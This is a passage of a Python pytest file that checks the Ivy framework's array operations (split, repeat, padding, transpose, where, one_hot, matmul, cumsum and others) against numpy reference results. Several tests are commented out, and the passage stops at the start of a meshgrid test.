# assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# stack
# @pytest.mark.parametrize(
# "xs_n_axis", [((1, 0), -1), (([[0., 1., 2.]], [[3., 4., 5.]]), 0), (([[0., 1., 2.]], [[3., 4., 5.]]), 1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_stack(xs_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# (x1, x2), axis = xs_n_axis
# if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x1 = tensor_fn(x1, dtype, dev)
# x2 = tensor_fn(x2, dtype, dev)
# ret = ivy.stack((x1, x2), axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
# if x1.shape == ():
# expected_shape = (2,)
# else:
# expected_shape = list(x1.shape)
# expected_shape.insert(axis_val, 2)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.stack, (x1, x2), axis),
# np.asarray(ivy.functional.backends.numpy.stack((ivy.to_numpy(x1), ivy.to_numpy(x2)), axis)))
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
        # mxnet only supports repeats defined as an int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
        # mxnet only supports repeats defined as an int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# tile
# @pytest.mark.parametrize(
# "x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# # smoke test
# x, reps_raw = x_n_reps
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret_from_list = ivy.tile(x, reps_raw)
# reps = ivy.array(reps_raw, 'int32', dev)
# ret = ivy.tile(x, reps)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if x.shape == ():
# expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
# else:
# expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
# assert ret.shape == expected_shape
# # value test
# assert np.allclose(call(ivy.tile, x, reps),
# np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# fourier_encode
# @pytest.mark.parametrize(
# "x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
# 3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
# ([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
# [[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
# -8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
# -6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
# 1.0000000e+00]],
# [[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
# -2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
# -1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
# 1.0000000e+00]],
# [[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
# -6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
# -3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
# 1.0000000e+00]]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# # smoke test
# x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# if isinstance(max_freq, list):
# max_freq = tensor_fn(max_freq, dtype, dev)
# ret = ivy.fourier_encode(x, max_freq, num_bands)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# x_shape = [1] if x.shape == () else list(x.shape)
# expected_shape = x_shape + [1 + 2*num_bands]
# assert list(ret.shape) == expected_shape
# # value test
# assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# transpose
@pytest.mark.parametrize(
"x_n_axes", [([[1.]], [1, 0]), ([[0., 1., 2., 3.]], [1, 0]), ([[[0., 1., 2.], [3., 4., 5.]]], [0, 2, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_transpose(x_n_axes, dtype, tensor_fn, dev, call):
# smoke test
x, axes = x_n_axes
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.transpose(x, axes)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = x.shape
assert ret.shape == tuple([x.shape[idx] for idx in axes])
# value test
assert np.allclose(call(ivy.transpose, x, axes), np.asarray(ivy.functional.backends.numpy.transpose(ivy.to_numpy(x), axes)))
# expand_dims
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.expand_dims(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# expected_shape = list(x.shape)
# expected_shape.insert(axis, 1)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# where
@pytest.mark.parametrize(
"cond_n_x1_n_x2", [(True, 2., 3.), (0., 2., 3.), ([True], [2.], [3.]), ([[0.]], [[2., 3.]], [[4., 5.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_where(cond_n_x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
cond, x1, x2 = cond_n_x1_n_x2
if (isinstance(cond, Number) or isinstance(x1, Number) or isinstance(x2, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
cond = tensor_fn(cond, dtype, dev)
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.where(cond, x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.where, cond, x1, x2),
np.asarray(ivy.functional.backends.numpy.where(ivy.to_numpy(cond), ivy.to_numpy(x1), ivy.to_numpy(x2))))
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isfinite, x), res)
# reshape
@pytest.mark.parametrize(
"x_n_shp", [(1., (1, 1)), (1., 1), (1., []), ([[1.]], []), ([[0., 1.], [2., 3.]], (1, 4, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_reshape(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.reshape(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ((new_shape,) if isinstance(new_shape, int) else tuple(new_shape))
# value test
assert np.allclose(call(ivy.reshape, x, new_shape), np.asarray(ivy.functional.backends.numpy.reshape(ivy.to_numpy(x), new_shape)))
# broadcast_to
@pytest.mark.parametrize(
"x_n_shp", [([1.], (2, 1)), ([[0., 1.], [2., 3.]], (10, 2, 2))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_broadcast_to(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.broadcast_to(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == len(new_shape)
# value test
assert np.allclose(call(ivy.broadcast_to, x, new_shape),
np.asarray(ivy.functional.backends.numpy.broadcast_to(ivy.to_numpy(x), new_shape)))
# squeeze
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([[1.]], None), ([[[0.], [1.]], [[2.], [3.]]], -1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_squeeze(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.squeeze(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if axis is None:
# expected_shape = [item for item in x.shape if item != 1]
# elif x.shape == ():
# expected_shape = []
# else:
# expected_shape = list(x.shape)
# expected_shape.pop(axis)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.squeeze, x, axis), np.asarray(ivy.functional.backends.numpy.squeeze(ivy.to_numpy(x), axis)))
# zeros
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_zeros(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.zeros(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# zeros_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.zeros_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.zeros_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.zeros_like(ivy.to_numpy(x), dtype)))
# ones
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.ones(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.ones, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.ones(shape, dtype)))
# ones_like
# @pytest.mark.parametrize(
# "x", [1, [1], [[1], [2], [3]]])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones_like(x, dtype, tensor_fn, dev, call):
# # smoke test
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.ones_like(x, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.ones_like, x, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# full
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "fill_val", [2., -7.])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_full(shape, fill_val, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.full(shape, fill_val, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.full, shape, fill_val, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.full(shape, fill_val, dtype)))
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# cross
@pytest.mark.parametrize(
"x1_n_x2", [([0., 1., 2.], [3., 4., 5.]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4., 5.], [5., 4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.cross(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.cross, x1, x2), np.asarray(ivy.functional.backends.numpy.cross(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# matmul
@pytest.mark.parametrize(
"x1_n_x2", [([[0., 1., 2.]], [[3.], [4.], [5.]]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4.], [5., 5.], [4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_matmul(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.matmul(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape[:-1] + (x2.shape[-1],)
# value test
assert np.allclose(call(ivy.matmul, x1, x2), np.asarray(ivy.functional.backends.numpy.matmul(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# identity
@pytest.mark.parametrize(
"dim_n_bs", [(3, None), (1, (2, 3)), (5, (1, 2, 3))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_identity(dim_n_bs, dtype, tensor_fn, dev, call):
# smoke test
dim, bs = dim_n_bs
ret = ivy.identity(dim, dtype, bs, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (tuple(bs) if bs else ()) + (dim, dim)
# value test
assert np.allclose(call(ivy.identity, dim, dtype, bs, dev),
np.asarray(ivy.functional.backends.numpy.identity(dim, dtype, bs)))
# meshgrid
@pytest.mark.parametrize(
"xs", [([1, 2, 3], [4, 5, 6]), ([1, 2, 3], [4, 5, 6, 7], [8, 9])])
@pytest.mark.parametrize(
"indexing", ['xy', 'ij'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_meshgrid(xs, indexing, dtype, tensor_fn, dev, call):
